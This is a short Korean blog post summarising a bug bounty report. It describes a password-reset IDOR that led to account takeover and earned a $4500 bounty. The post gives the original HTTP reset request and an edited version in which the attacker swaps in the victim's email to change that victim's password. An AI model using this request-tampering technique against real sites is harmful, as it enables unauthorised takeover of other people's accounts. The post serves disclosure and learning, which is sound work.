Hack The World
A Simple IDOR to Account Takeover 본문
비밀번호reset 페이지에서 간단한 IDOR 로 $4500 을 받은 리포트
원본:https://medium.com/@swapmaurya20/a-simple-idor-to-account-takeover-88b8a1d2ec24
Original Request:-
POST /login/internalResetPasswordSubmit?Toketoken=random_char&m=1234&nid=random_char HTTP/1.1
Host: subdomain.example.com
Headers: Etc
Cookie: all_required_cookies
{“email”:”attacker_account@test.com”,”password”:”new_passwd”,”confirmPassword”:”new_passwd”}
Edited Request:-
POST /login/internalResetPasswordSubmit?Toketoken=random_char&m=1234&nid=random_char HTTP/1.1
Host: subdomain.example.com
Headers: Etc
Cookie: all_required_cookies
{“email”:”victim_account@test.com”,”password”:”new_passwd”,”confirmPassword”:”new_passwd”}
공격자의 패스워드를 변경하는 요청에서 email 을 희생자의 이메일로 변경하고 요청했더니
희생자의 비밀번호가 변경.
내가 하는 사이트에서는 이런 간단한 취약점은 절때 안나오던데...휴...
이 취약점으로 헌터는 $4500 포상금 받은 개꿀 취약점
'BugBounty > Write up' 카테고리의 다른 글
Host header injection 취약점 $800 (0) | 2020.04.08 |
---|---|
IDOR + PATCH 메소드 사용 계정우회 (0) | 2020.03.10 |
Hyperlink Injection - Easy Money (sometimes) (0) | 2020.02.28 |
hacked Uber Account (0) | 2020.02.14 |
Host header poisoning 비밀번호 탈취 (0) | 2020.02.13 |